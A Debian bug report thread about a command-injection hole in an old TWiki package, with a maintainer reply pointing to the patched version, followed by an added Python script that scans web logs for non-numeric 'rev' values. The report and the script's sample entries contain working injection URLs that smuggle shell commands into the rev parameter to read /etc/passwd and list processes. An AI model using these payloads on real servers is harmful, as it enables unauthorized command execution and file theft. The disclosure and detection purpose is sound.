Why are you running a totally outdated twiki package?

http://packages.debian.org/unstable/web/twiki only lists 20040902-3, in which this problem has been solved using the robustness patch from Florian Weimer <[EMAIL PROTECTED]>

Cheers
Sven

Paul Szabo wrote:
> Package: twiki
> Version: 20030201-6
> Severity: critical
> Justification: root security hole
>
> Please see
>
>   http://www.securityfocus.com/archive/1/410721
>
> Verified with
>
>   http://iw/iw/view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd
>   http://iw/iw/view/Main/TWikiUsers?rev=2%20%7Cps%20aux|cat%20--%20-%20
>
> that it allows access as www-data, the apache user.
>
> -- System Information:
> Debian Release: 3.1
> Architecture: i386 (i686)
> Kernel: Linux 2.6.8-spb0.3
> Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
>
> Versions of packages twiki depends on:
> ii  apache-common               1.3.33-6sarge1  support files for all Apache webse
> ii  debconf                     1.4.30.13       Debian configuration management sy
> ii  libalgorithm-diff-perl      1.19.01-1       a perl library for finding Longest
> ii  libdigest-sha1-perl         2.10-1          NIST SHA-1 message digest algorith
> ii  perl [libmime-base64-perl   5.8.4-8         Larry Wall's Practical Extraction
> ii  perl-modules [libnet-perl   5.8.4-8         Core Perl modules
> ii  rcs                         5.7-15          The GNU Revision Control System
>
> -- debconf information:
> * twiki/apacheUserCreationNote:
> * twiki/samplefiles: true
> * twiki/wikiwebmaster: [EMAIL PROTECTED]
> * twiki/defaultUrlHost: http://iw.maths.usyd.edu.au
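
A log check for the request pattern in the bug report, as an added example that is not part of the original thread or of the TWiki package: it flags view requests whose rev parameter is anything other than a plain revision number. The revision-number format, the function names and the sample log entries are assumptions constructed for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a legitimate rev value is a plain revision number ("2", "1.14").
VALID_REV = re.compile(r"\d+(?:\.\d+)*")
# Client address and request target of an Apache common/combined log entry.
ENTRY = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries (documentation addresses, not real traffic).
# The two flagged targets reuse the rev values quoted in the bug report.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Sep/2005:08:01:12 +1000] '
    '"GET /iw/view/Main/TWikiUsers?rev=1.3 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [16/Sep/2005:08:02:40 +1000] '
    '"GET /iw/view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd HTTP/1.1" 200 901',
    '192.0.2.77 - - [16/Sep/2005:08:02:55 +1000] '
    '"GET /iw/view/Main/TWikiUsers?rev=2%20%7Cps%20aux|cat%20--%20-%20 HTTP/1.1" 200 877',
    '192.0.2.10 - - [16/Sep/2005:08:03:01 +1000] '
    '"GET /iw/view/Main/WebHome HTTP/1.1" 200 4410',
]


def bad_rev_values(entry):
    """Return (client, [decoded rev values]) when a rev value is not a plain
    revision number, otherwise None (also for lines that do not parse)."""
    m = ENTRY.match(entry)
    if not m:
        return None
    client, target = m.groups()
    # parse_qsl percent-decodes once, so %20 and %7C show up as ' ' and '|'.
    # Matching against an allowlist also catches double-encoded values,
    # because a leftover '%' is not part of a revision number either.
    values = [v for k, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)
              if k == "rev" and not VALID_REV.fullmatch(v)]
    return (client, values) if values else None


def scan(lines):
    """Return every (client, values) hit found in an iterable of log lines."""
    return [hit for hit in map(bad_rev_values, lines) if hit]


if __name__ == "__main__":
    for client, values in scan(SAMPLE_LOG):
        print(client, values)
```

The same allowlist pattern is what an input check on rev would enforce before the value reaches any external command; the check here only reports what already arrived.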